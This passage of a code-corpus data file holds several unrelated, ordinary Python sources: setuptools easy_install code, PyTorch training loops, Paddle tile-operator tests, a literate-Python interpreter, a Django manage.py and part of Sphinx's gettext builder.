import setuptools\n\n argv0 = os.path.dirname(setuptools.__path__[0])\n sys.argv[0] = argv0\n sys.argv.append(argv0)\n main()\n\n\ndef main(argv=None, **kw):\n from setuptools import setup\n from setuptools.dist import Distribution\n\n 
class DistributionWithoutHelpCommands(Distribution):\n common_usage = \"\"\n\n def _show_help(self, *args, **kw):\n with _patch_usage():\n Distribution._show_help(self, *args, **kw)\n\n if argv is None:\n argv = sys.argv[1:]\n\n with _patch_usage():\n setup(\n script_args=['-q', 'easy_install', '-v'] + argv,\n script_name=sys.argv[0] or 'easy_install',\n distclass=DistributionWithoutHelpCommands, **kw\n )\n\n\n@contextlib.contextmanager\ndef _patch_usage():\n import distutils.core\n USAGE = textwrap.dedent(\"\"\"\n usage: %(script)s [options] requirement_or_url ...\n or: %(script)s --help\n \"\"\").lstrip()\n\n def gen_usage(script_name):\n return USAGE % dict(\n script=os.path.basename(script_name),\n )\n\n saved = distutils.core.gen_usage\n distutils.core.gen_usage = gen_usage\n try:\n yield\n finally:\n distutils.core.gen_usage = saved\n\n"} {"ext": "py", "sha": "1a2f56cf093b461b930e93a13c1778c2f4a7b13d", "content": "import matplotlib.pyplot as plt\nimport math, cv2, glob\nimport numpy as np\n\nclass ImageVisualizer:\n # region vars\n\n # endregion\n def __init__(self, shape):\n self.shape = shape\n\n # to get a name of parameter variable to print a name in subplot\n def param_to_str(self, obj, namespace):\n return [name for name in namespace if namespace[name] is obj]\n\n # tool to draw multiple images on plot\n def plot_images(self, images, descriptions = None, invert_colors=False):\n w = self.shape[0]\n h = self.shape[1]\n fig = plt.figure(figsize=(8, 8))\n total_images = len(images)\n rows = math.ceil(total_images/3)\n columns = math.ceil(total_images/rows)\n for i in range(1, total_images + 1):\n fig.add_subplot(rows, columns, i)\n if invert_colors and len(images[i-1].shape) > 2: \n plt.imshow(cv2.cvtColor(images[i-1], cv2.COLOR_BGR2RGB)) # need to invert colors\n else:\n plt.imshow(images[i-1]) # do not need to invert colors when showing binary images\n #plt.gca().set_title(self.param_to_str(images[i-1], globals()))\n if not descriptions is None:\n plt.gca().set_title(descriptions[i-1])\n mng = plt.get_current_fig_manager() # to maximize window\n mng.window.state('zoomed')\n plt.show()\n \n def get_image_info(self, image, alias ):\n print(f'Image {alias} shape is: {image.shape}')\n \n # tests solid green area on blank image\n def draw_solid_area_on_blank_image(self, array_of_points):\n blank_image = np.zeros(self.shape, dtype=np.uint8) \n cv2.fillPoly(blank_image, pts = [array_of_points],color = (255,255,0))\n return blank_image\n \n def overlay_image_with_solid_area(self, main_image, image2): \n return cv2.addWeighted(main_image, 0.8, image2, 0.2, 0)\n\n"} {"ext": "py", "sha": "1a2f570b022acc9b4789b5e3b9b14ecd5de70a22", "content": "# coding=utf-8\n\n# 异常处理\n\ntry:\n file = open(\"hejeffery.txt\", \"r\")\n\nexcept IOError:\n print \"没有找到文件\"\n\nelse:\n print \"找到文件了\"\n\n\ntry:\n file = open(\"hejeffery.txt\", \"r\")\n\nexcept IOError:\n print \"没有找到文件\"\n\nfinally:\n print \"始终都会执行这句话\""} {"ext": "py", "sha": "1a2f5942ee004989816d672fa57d7dab25fe65a7", "content": "import torch\nfrom tqdm import tqdm\nfrom utils import Logger, AverageMeter, accuracy\n\nimport numpy as np\n\n\ndef train(trainloader, model, criterion, optimizer):\n # switch to train mode\n model.train()\n\n losses = AverageMeter()\n top1 = AverageMeter()\n top3 = AverageMeter()\n top5 = AverageMeter()\n\n criterion.reset()\n\n bar = tqdm(enumerate(trainloader), total=len(trainloader))\n for batch_idx, (inputs, targets) in bar:\n \n inputs, targets = inputs.cuda(), targets.cuda()\n\n # compute output\n outputs = 
model(inputs)\n\n loss_dict = criterion(outputs, targets)\n\n loss = loss_dict[0][\"loss\"]\n\n # measure accuracy and record loss\n prec1, prec3, prec5 = accuracy(outputs.data, targets.data, topk=(1, 3, 5))\n losses.update(loss.item(), inputs.size(0))\n\n top1.update(prec1.item(), inputs.size(0))\n top3.update(prec3.item(), inputs.size(0))\n top5.update(prec5.item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # plot progress\n bar.set_postfix_str('({batch}/{size}) Loss: {loss:.8f} | top1: {top1: .4f} | top3: {top3: .4f} | top5: {top5: .4f}'.format(\n batch=batch_idx + 1,\n size=len(trainloader),\n loss=losses.avg,\n top1=top1.avg,\n top3=top3.avg,\n top5=top5.avg,\n ))\n\n return (losses.avg, top1.avg, top3.avg, top5.avg)\n\n@torch.no_grad()\ndef test(testloader, model, criterion, ece_criterion, sce_criterion, T=1.0):\n\n criterion.reset()\n ece_criterion.reset()\n sce_criterion.reset()\n\n losses = AverageMeter()\n top1 = AverageMeter()\n top3 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n bar = tqdm(enumerate(testloader), total=len(testloader))\n for batch_idx, (inputs, targets) in bar:\n\n inputs, targets = inputs.cuda(), targets.cuda()\n\n # compute output\n outputs = model(inputs)\n outputs /= T\n\n loss_dict = criterion(outputs, targets)\n\n loss = loss_dict[0][\"loss\"]\n\n ece_criterion.forward(outputs,targets)\n sce_criterion.forward(outputs,targets)\n \n prec1, prec3, prec5 = accuracy(outputs.data, targets.data, topk=(1, 3, 5))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec1.item(), inputs.size(0))\n top3.update(prec3.item(), inputs.size(0))\n top5.update(prec5.item(), inputs.size(0))\n\n\n # plot progress\n bar.set_postfix_str('({batch}/{size}) Loss: {loss:.8f} | top1: {top1: .4f} | top3: {top3: .4f} | top5: {top5: .4f}'.format(\n batch=batch_idx + 1,\n size=len(testloader),\n loss=losses.avg,\n top1=top1.avg,\n top3=top3.avg,\n top5=top5.avg,\n ))\n\n eces = ece_criterion.get_overall_ECELoss()\n cces = sce_criterion.get_overall_CCELoss()\n\n return (losses.avg, top1.avg, top3.avg, top5.avg, cces.item(), eces.item())\n\n@torch.no_grad()\ndef get_logits_targets(testloader, model):\n\n # switch to evaluate mode\n model.eval()\n\n all_targets = None\n all_outputs = None\n\n bar = tqdm(testloader, total=len(testloader))\n for inputs, targets in bar:\n inputs = inputs.cuda()\n # compute output\n outputs = model(inputs)\n # to numpy\n targets = targets.cpu().numpy()\n outputs = outputs.cpu().numpy()\n\n if all_targets is None:\n all_outputs = outputs\n all_targets = targets\n else:\n all_targets = np.concatenate([all_targets, targets], axis=0)\n all_outputs = np.concatenate([all_outputs, outputs], axis=0)\n\n return all_outputs, all_targets\n\n@torch.no_grad()\ndef get_logits_targets_torch(testloader, model):\n\n # switch to evaluate mode\n model.eval()\n\n all_targets = None\n all_outputs = None\n\n bar = tqdm(testloader, total=len(testloader))\n for inputs, targets in bar:\n inputs = inputs.cuda()\n targets= targets.cuda()\n # compute output\n outputs = model(inputs)\n\n if all_targets is None:\n all_outputs = outputs\n all_targets = targets\n else:\n all_targets = torch.cat([all_targets, targets], dim=0)\n all_outputs = torch.cat([all_outputs, outputs], dim=0)\n\n return all_outputs, all_targets\n\n\ndef fine_tune(trainloader, model, criterion, optimizer):\n # switch to train mode\n model.train()\n\n losses = AverageMeter()\n top1 = 
AverageMeter()\n top3 = AverageMeter()\n top5 = AverageMeter()\n\n criterion.reset()\n \n for batch_idx, (inputs, targets) in enumerate(trainloader):\n \n inputs, targets = inputs.cuda(), targets.cuda()\n # compute output\n outputs = model(inputs)\n \n loss_dict = criterion(outputs, targets)\n loss = loss_dict[0][\"loss\"]\n\n # measure accuracy and record loss\n losses.update(loss.item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n return losses.avg"} {"ext": "py", "sha": "1a2f596b243c27f687f209e4729403099f81c8f4", "content": "from typing import Optional\n\nfrom server.crud.base import CRUDBase\nfrom server.db.models import RolesTable\nfrom server.schemas.role import RoleCreate, RoleUpdate\n\n\nclass CRUDRole(CRUDBase[RolesTable, RoleCreate, RoleUpdate]):\n def get_by_name(self, *, name: str) -> Optional[RolesTable]:\n return RolesTable.query.filter(RolesTable.name == name).first()\n\n\nrole_crud = CRUDRole(RolesTable)\n"} {"ext": "py", "sha": "1a2f5a912c80f5b551c5ebad298ebd156262d6dd", "content": "# Copyright 2014, Solly Ross (see LICENSE.txt)\n# Portions Copyright Python Software Foundation\n# (see COPYRIGHT.txt and PYTHON-LICENSE.txt)\n\n# main part\nimport code\nimport contextlib\nimport doctest\nimport getpass\nimport linecache\nimport pdb\nimport re\nimport sys\nimport traceback\nimport warnings\n\nimport six\n\nfrom yalpt import ansi_helper as ansi\nfrom yalpt import formatters\nfrom yalpt import parsers\n\n\n__all__ = [\"LiterateInterpreter\"]\n\n\n@contextlib.contextmanager\ndef noop_mgr(writer):\n yield writer\n\n\nclass LiterateInterpreter(code.InteractiveConsole):\n def __init__(self, text_formatter=formatters.NoopFormatter(),\n code_parser=parsers.DocTestParser(), use_ansi=True,\n use_readline=True, env_driver=None, *args, **kwargs):\n code.InteractiveConsole.__init__(self, *args, **kwargs)\n\n self._output_checker = doctest.OutputChecker()\n self._fakeout = doctest._SpoofOut()\n self.chunks = None\n self.exc_msg = None\n self.name = 'literate program'\n self.text_formatter = text_formatter\n self.code_parser = code_parser\n self.use_ansi = use_ansi\n self.pause = True\n self.interactive = True\n\n if use_readline:\n self._readline = __import__('readline')\n self._add_readline()\n else:\n self._readline = None\n\n self._env_driver = env_driver\n\n self._correct_path()\n\n def runfunction(self, func):\n self.runcode(six.get_function_code(func))\n\n def _correct_path(self):\n def correct_path():\n import sys\n if '' not in sys.path:\n sys.path.insert(0, '')\n del sys\n\n self.runfunction(correct_path)\n\n def _add_readline(self):\n self.locals['__console_locals__'] = self.locals\n self.locals['readline'] = self._readline\n\n def add_readline():\n # add support for completion\n import atexit\n import os\n import readline\n import rlcompleter\n\n completer = rlcompleter.Completer(__console_locals__) # noqa\n readline.set_completer(completer.complete)\n\n # tab completion\n readline.parse_and_bind('Control-space: complete')\n # history file\n histfile = os.path.join(os.environ['HOME'],\n '.literate-python-history')\n try:\n readline.read_history_file(histfile)\n except IOError:\n pass\n atexit.register(readline.write_history_file, histfile)\n del os, histfile, readline, rlcompleter\n\n self.runfunction(add_readline)\n\n del self.locals['__console_locals__']\n del self.locals['readline']\n\n def _interact_once(self, more):\n try:\n if more:\n prompt = sys.ps2\n else:\n prompt = sys.ps1\n try:\n line = 
self.raw_input(prompt)\n # Can be None if sys.stdin was redefined\n encoding = getattr(sys.stdin, \"encoding\", None)\n if encoding and not isinstance(line, six.text_type):\n line = line.decode(encoding)\n except EOFError:\n self.write(\"\\n\")\n return (False, None)\n else:\n if len(line) == 0:\n blank = True\n else:\n blank = False\n more = self.push(line)\n except KeyboardInterrupt:\n self.write(\"\\nKeyboardInterrupt\\n\")\n self.resetbuffer()\n more = False\n blank = False\n\n return (blank, more)\n\n # BEGIN FROM PYTHON STD LIB\n # (extracted from the doctest module, made slight changes to the\n # filename RE, and refactored _capture_output into its own method)\n __LINECACHE_FILENAME_RE = re.compile(r'.+)'\n r'\\[(?P\\d+)\\]>$')\n\n def _patched_linecache_getlines(self, filename, module_globals=None):\n m = self.__LINECACHE_FILENAME_RE.match(filename)\n if m and m.group('name') == self.name:\n chunk = self.chunks[int(m.group('chunknum'))]\n source = chunk.source\n if isinstance(source, six.text_type):\n source = source.encode('ascii', 'backslashreplace')\n return source.splitlines(True)\n else:\n return self.save_linecache_getlines(filename, module_globals)\n\n @contextlib.contextmanager\n def _capture_output(self):\n save_stdout = sys.stdout\n sys.stdout = self._fakeout\n\n # set up pdb to work properly\n save_set_trace = pdb.set_trace\n self.debugger = doctest._OutputRedirectingPdb(save_stdout)\n self.debugger.reset()\n pdb.set_trace = self.debugger.set_trace\n self.save_linecache_getlines = linecache.getlines\n linecache.getlines = self._patched_linecache_getlines\n save_displayhook = sys.displayhook\n sys.displayhook = sys.__displayhook__\n\n try:\n yield sys.stdout\n finally:\n sys.stdout = save_stdout\n pdb.set_trace = save_set_trace\n linecache.getlines = self.save_linecache_getlines\n sys.displayhook = save_displayhook\n # END FROM PYTHON STD LIB\n\n def _process_code_line(self, line, res, more):\n if self._readline is not None:\n self._readline.add_history(line)\n\n if more:\n self.write(sys.ps2)\n else:\n self.write(sys.ps1)\n\n if self.use_ansi:\n self.write(ansi.with_codes(line, 38, 5, 0xdf))\n else:\n self.write(line)\n\n self.write(\"\\n\")\n with self._capture_output() as output:\n more = self.push(line)\n\n res += output.getvalue()\n output.truncate(0)\n\n exc = self.exc_msg\n self.exc_msg = None\n return (res, exc, more)\n\n def _format_tb(self):\n try:\n extype, value, tb = sys.exc_info()\n sys.last_type = extype\n sys.last_value = value\n sys.last_traceback = tb\n res = traceback.format_exception_only(extype, value)\n finally:\n tb = None\n\n if res:\n return res[-1]\n\n def showtraceback(self):\n try:\n extype, value, tb = sys.exc_info()\n sys.last_type = extype\n sys.last_value = value\n sys.last_traceback = tb\n tblist = traceback.extract_tb(tb)\n del tblist[:1]\n lst = traceback.format_list(tblist)\n if lst:\n lst.insert(0, \"Traceback (most recent call last):\\n\")\n exc_msg = traceback.format_exception_only(extype, value)\n lst[len(lst):] = exc_msg\n finally:\n tblist = tb = None\n\n if self.filename.startswith(\"\".format(name=self.name,\n num=chunk_ind)\n more = False\n res = \"\"\n lines = chunk.source.split(\"\\n\")\n for line in lines[:-1]:\n res, exc, more = self._process_code_line(line, res, more)\n\n if more:\n res, exc, more = self._process_code_line(lines[-1], res, more)\n\n if self.use_ansi:\n mgr = ansi.BoxMaker(self)\n else:\n mgr = noop_mgr(self)\n\n if chunk.want is not None or chunk.exc_msg is not None:\n if len(res) > 0 or exc is not None:\n 
# compare to the expected output\n # TODO(sross): convert options to optionsflags\n optionsflags = 0\n\n checker = self._output_checker\n if exc is None:\n same = self._output_checker.check_output(chunk.want,\n res, 0)\n if not same:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, output different from '\n 'expected:\\n')\n maker.write('================================'\n '========\\n\\n')\n diff = checker.output_difference(chunk, res,\n optionsflags)\n maker.write(diff)\n self.write('\\n')\n else:\n self.write(res)\n elif chunk.exc_msg is None:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, unexpected exception:\\n')\n maker.write('==============================\\n\\n')\n maker.write(exc)\n self.write('\\n')\n else:\n same_ex = checker.check_output(chunk.exc_msg,\n exc, optionsflags)\n if not same_ex:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, exception different from '\n 'expected:\\n')\n maker.write('=================================='\n '=========\\n\\n')\n diff = checker.output_difference(chunk, res,\n optionsflags)\n maker.write(diff)\n self.write('\\n')\n else:\n self.write(res)\n else:\n if exc is not None:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, unexpected exception:\\n')\n maker.write('==============================\\n\\n')\n maker.write(exc)\n self.write('\\n')\n else:\n self.write(res)\n\n if not self.pause:\n self.write(sys.ps1 + '\\n')\n\n def no_echo_input(self, prompt):\n with warnings.catch_warnings():\n res = getpass.getpass(prompt)\n return res\n\n def interact(self, lit_string, name, pause=True, interactive=True):\n self.name = name\n self.pause = pause\n self.interactive = interactive\n\n try:\n sys.ps1\n except AttributeError:\n sys.ps1 = \">>> \"\n\n try:\n sys.ps2\n except AttributeError:\n sys.ps2 = \"... \"\n\n try:\n sys.ps3\n except AttributeError:\n sys.ps3 = '>>> '\n\n if self._env_driver is not None:\n extra_locals = self._env_driver.setup()\n self.locals.update(extra_locals)\n extra_banner = self._env_driver.banner\n driver_text = \" ({0})\".format(self._env_driver.DRIVER_NAME)\n else:\n extra_banner = \"\"\n driver_text = \"\"\n\n cprt = ('Type \"help\", \"copyright\", \"credits\" or \"license\" for '\n 'more information about Python.')\n self.write(\"Literate Python Shell{driver_text}\\nPython {ver} \"\n \"on {platform}\\n{cprt}\\n\"\n \"{extra_banner}\\n\\n\".format(driver_text=driver_text,\n ver=sys.version,\n platform=sys.platform,\n cprt=cprt,\n extra_banner=extra_banner))\n\n if not interactive and pause:\n self.write('Press enter to continue after a code block\\n\\n')\n\n try:\n parser = self.code_parser\n start = True\n self.chunks = list(parser.parse(lit_string, name))\n for chunk_ind, chunk in enumerate(self.chunks):\n if isinstance(chunk, parsers.CodeChunk):\n self._run_code(chunk, chunk_ind)\n elif not chunk:\n continue\n else:\n if not start and pause and interactive:\n self.filename = \"\"\n more = False\n blanks = 0\n while blanks < 2:\n blank, more = self._interact_once(more)\n\n if blank:\n blanks += 1\n else:\n blanks = 0\n\n if more is None:\n return\n\n # reset exc_msg so it doesn't get\n # raised after the next code block\n self.exc_msg = None\n elif not start and pause:\n self.no_echo_input(sys.ps3)\n\n self.write(self.text_formatter.format(chunk))\n\n start = False\n\n complete_msg = (\"\\n{file} complete! 
Continuing to interactive \"\n \"console...\\n\\n\".format(file=self.name))\n\n if self.use_ansi:\n self.write(ansi.with_codes(complete_msg, 1))\n else:\n self.write(complete_msg)\n\n self.filename = \"\"\n self.locals['con'] = self\n more = False\n while more is not None:\n blank, more = self._interact_once(more)\n finally:\n if self._env_driver is not None:\n self._env_driver.teardown()\n"} {"ext": "py", "sha": "1a2f5ae8d3c02f130f839a951dcfb420bc66083b", "content": "# print absolute value of an integer\n# python的语法比较简单,采用缩进方式\na = 100\nif a>=0 :\n print(a)\nelse :\n print(-a)\n"} {"ext": "py", "sha": "1a2f5baed8b7607321747e371d736b51f44b1f86", "content": "\"\"\"\ndatauri, library for \"data:\" URIs as defined in RFC 2397.\n\"\"\"\n\nfrom .datauri import ( # noqa: F401\n DataURIError,\n discover,\n parse)\n"} {"ext": "py", "sha": "1a2f5dbd40eb6ca1bdd7c250d3497c57722d9386", "content": "# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport sys\n\nsys.path.append(\"..\")\nimport unittest\nimport numpy as np\nfrom op_test import OpTest\nimport paddle\nimport paddle.fluid as fluid\nfrom paddle.fluid import compiler, Program, program_guard\n\n\n#Situation 1: repeat_times is a list (without tensor)\nclass TestTileOpRank1(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.init_data()\n self.inputs = {'X': np.random.random(self.ori_shape).astype(\"float32\")}\n self.attrs = {'repeat_times': self.repeat_times}\n output = np.tile(self.inputs['X'], self.repeat_times)\n self.outputs = {'Out': output}\n\n def init_data(self):\n self.ori_shape = [100]\n self.repeat_times = [2]\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad(['X'], 'Out')\n\n\n# with dimension expanding\nclass TestTileOpRank2Expanding(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = [120]\n self.repeat_times = [2, 2]\n\n\nclass TestTileOpRank2(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [2, 3]\n\n\nclass TestTileOpRank3_Corner(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 10, 5)\n self.repeat_times = (1, 1, 1)\n\n\nclass TestTileOpRank3_Corner2(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 10, 5)\n self.repeat_times = (2, 2)\n\n\nclass TestTileOpRank3(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 4, 15)\n self.repeat_times = (2, 1, 4)\n\n\nclass TestTileOpRank4(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 4, 5, 7)\n self.repeat_times = (3, 2, 1, 2)\n\n\n# Situation 2: repeat_times is a list (with tensor)\nclass TestTileOpRank1_tensor_attr(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.init_data()\n repeat_times_tensor = []\n for index, ele in 
enumerate(self.repeat_times):\n repeat_times_tensor.append((\"x\" + str(index), np.ones(\n (1)).astype('int32') * ele))\n\n self.inputs = {\n 'X': np.random.random(self.ori_shape).astype(\"float32\"),\n 'repeat_times_tensor': repeat_times_tensor,\n }\n self.attrs = {\"repeat_times\": self.infer_repeat_times}\n output = np.tile(self.inputs['X'], self.repeat_times)\n self.outputs = {'Out': output}\n\n def init_data(self):\n self.ori_shape = [100]\n self.repeat_times = [2]\n self.infer_repeat_times = [-1]\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad(['X'], 'Out')\n\n\nclass TestTileOpRank2_Corner_tensor_attr(TestTileOpRank1_tensor_attr):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [1, 1]\n self.infer_repeat_times = [1, -1]\n\n\nclass TestTileOpRank2_attr_tensor(TestTileOpRank1_tensor_attr):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [2, 3]\n self.infer_repeat_times = [-1, 3]\n\n\n# Situation 3: repeat_times is a tensor\nclass TestTileOpRank1_tensor(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.init_data()\n self.inputs = {\n 'X': np.random.random(self.ori_shape).astype(\"float32\"),\n 'RepeatTimes': np.array(self.repeat_times).astype(\"int32\"),\n }\n self.attrs = {}\n output = np.tile(self.inputs['X'], self.repeat_times)\n self.outputs = {'Out': output}\n\n def init_data(self):\n self.ori_shape = [100]\n self.repeat_times = [2]\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad(['X'], 'Out')\n\n\nclass TestTileOpRank2_tensor(TestTileOpRank1_tensor):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [2, 3]\n\n\n# Situation 4: input x is Integer\nclass TestTileOpInteger(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.inputs = {\n 'X': np.random.randint(10, size=(4, 4, 5)).astype(\"int32\")\n }\n self.attrs = {'repeat_times': [2, 1, 4]}\n output = np.tile(self.inputs['X'], (2, 1, 4))\n self.outputs = {'Out': output}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\n# Situation 5: input x is Bool\nclass TestTileOpBoolean(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.inputs = {'X': np.random.randint(2, size=(2, 4, 5)).astype(\"bool\")}\n self.attrs = {'repeat_times': [2, 1, 4]}\n output = np.tile(self.inputs['X'], (2, 1, 4))\n self.outputs = {'Out': output}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\n# Situation 56: input x is Integer\nclass TestTileOpInt64_t(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.inputs = {\n 'X': np.random.randint(10, size=(2, 4, 5)).astype(\"int64\")\n }\n self.attrs = {'repeat_times': [2, 1, 4]}\n output = np.tile(self.inputs['X'], (2, 1, 4))\n self.outputs = {'Out': output}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestTileError(unittest.TestCase):\n\n def test_errors(self):\n with program_guard(Program(), Program()):\n x1 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],\n fluid.CPUPlace())\n repeat_times = [2, 2]\n self.assertRaises(TypeError, paddle.tile, x1, 
repeat_times)\n x2 = fluid.layers.data(name='x2', shape=[4], dtype=\"uint8\")\n self.assertRaises(TypeError, paddle.tile, x2, repeat_times)\n x3 = fluid.layers.data(name='x3', shape=[4], dtype=\"bool\")\n x3.stop_gradient = False\n self.assertRaises(ValueError, paddle.tile, x3, repeat_times)\n\n\nclass TestTileAPIStatic(unittest.TestCase):\n\n def test_api(self):\n with program_guard(Program(), Program()):\n repeat_times = [2, 2]\n x1 = fluid.layers.data(name='x1', shape=[4], dtype=\"int32\")\n out = paddle.tile(x1, repeat_times)\n positive_2 = fluid.layers.fill_constant([1], dtype=\"int32\", value=2)\n out2 = paddle.tile(x1, repeat_times=[positive_2, 2])\n\n\n# Test python API\nclass TestTileAPI(unittest.TestCase):\n\n def test_api(self):\n with fluid.dygraph.guard():\n np_x = np.random.random([12, 14]).astype(\"float32\")\n x = paddle.to_tensor(np_x)\n\n positive_2 = np.array([2]).astype(\"int32\")\n positive_2 = paddle.to_tensor(positive_2)\n\n repeat_times = np.array([2, 3]).astype(\"int32\")\n repeat_times = paddle.to_tensor(repeat_times)\n\n out_1 = paddle.tile(x, repeat_times=[2, 3])\n out_2 = paddle.tile(x, repeat_times=[positive_2, 3])\n out_3 = paddle.tile(x, repeat_times=repeat_times)\n\n assert np.array_equal(out_1.numpy(), np.tile(np_x, (2, 3)))\n assert np.array_equal(out_2.numpy(), np.tile(np_x, (2, 3)))\n assert np.array_equal(out_3.numpy(), np.tile(np_x, (2, 3)))\n\n\nif __name__ == \"__main__\":\n paddle.enable_static()\n unittest.main()\n"} {"ext": "py", "sha": "1a2f5e8bab97eb229d96cd075b7cc632d8e8b611", "content": "# Copyright 2016-2019 Dirk Thomas\n# Licensed under the Apache License, Version 2.0\n\nfrom pathlib import Path\n\nimport pytest\nfrom scspell import Report\nfrom scspell import SCSPELL_BUILTIN_DICT\nfrom scspell import spell_check\n\n\nspell_check_words_path = Path(__file__).parent / 'spell_check.words'\n\n\n@pytest.fixture(scope='module')\ndef known_words():\n global spell_check_words_path\n return spell_check_words_path.read_text().splitlines()\n\n\ndef test_spell_check(known_words):\n source_filenames = [Path(__file__).parents[1] / 'setup.py'] + \\\n list(\n (Path(__file__).parents[1] / 'colcon_metadata')\n .glob('**/*.py')) + \\\n list((Path(__file__).parents[1] / 'test').glob('**/*.py'))\n\n for source_filename in sorted(source_filenames):\n print('Spell checking:', source_filename)\n\n # check all files\n report = Report(known_words)\n spell_check(\n [str(p) for p in source_filenames], base_dicts=[SCSPELL_BUILTIN_DICT],\n report_only=report, additional_extensions=[('', 'Python')])\n\n unknown_word_count = len(report.unknown_words)\n assert unknown_word_count == 0, \\\n 'Found {unknown_word_count} unknown words: '.format_map(locals()) + \\\n ', '.join(sorted(report.unknown_words))\n\n unused_known_words = set(known_words) - report.found_known_words\n unused_known_word_count = len(unused_known_words)\n assert unused_known_word_count == 0, \\\n '{unused_known_word_count} words in the word list are not used: ' \\\n .format_map(locals()) + ', '.join(sorted(unused_known_words))\n\n\ndef test_spell_check_word_list_order(known_words):\n assert known_words == sorted(known_words), \\\n 'The word list should be ordered alphabetically'\n\n\ndef test_spell_check_word_list_duplicates(known_words):\n assert len(known_words) == len(set(known_words)), \\\n 'The word list should not contain duplicates'\n"} {"ext": "py", "sha": "1a2f5f20c7a5fba766f0599d46bbdc5f002967b3", "content": "#!/usr/bin/env python\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n 
os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"bootProj.settings\")\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n"} {"ext": "py", "sha": "1a2f5fcebf615e5a0064a633180aae48ca9e6486", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n sphinx.builders.gettext\n ~~~~~~~~~~~~~~~~~~~~~~~\n\n The MessageCatalogBuilder class.\n\n :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom os import path, walk\nfrom codecs import open\nfrom time import time\nfrom datetime import datetime, tzinfo, timedelta\nfrom collections import defaultdict\nfrom uuid import uuid4\n\nfrom six import iteritems\n\nfrom sphinx.builders import Builder\nfrom sphinx.util import split_index_msg\nfrom sphinx.util.nodes import extract_messages, traverse_translatable_index\nfrom sphinx.util.osutil import safe_relpath, ensuredir, find_catalog, SEP\nfrom sphinx.util.console import darkgreen, purple, bold\nfrom sphinx.locale import pairindextypes\n\nPOHEADER = r\"\"\"\n# SOME DESCRIPTIVE TITLE.\n# Copyright (C) %(copyright)s\n# This file is distributed under the same license as the %(project)s package.\n# FIRST AUTHOR , YEAR.\n#\n#, fuzzy\nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: %(project)s %(version)s\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: %(ctime)s\\n\"\n\"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\\n\"\n\"Last-Translator: FULL NAME \\n\"\n\"Language-Team: LANGUAGE \\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n\n\"\"\"[1:]\n\n\nclass Catalog(object):\n \"\"\"Catalog of translatable messages.\"\"\"\n\n def __init__(self):\n self.messages = [] # retain insertion order, a la OrderedDict\n self.metadata = {} # msgid -> file, line, uid\n\n def add(self, msg, origin):\n if not hasattr(origin, 'uid'):\n # Nodes that are replicated like todo don't have a uid,\n # however i18n is also unnecessary.\n return\n if msg not in self.metadata: # faster lookup in hash\n self.messages.append(msg)\n self.metadata[msg] = []\n self.metadata[msg].append((origin.source, origin.line, 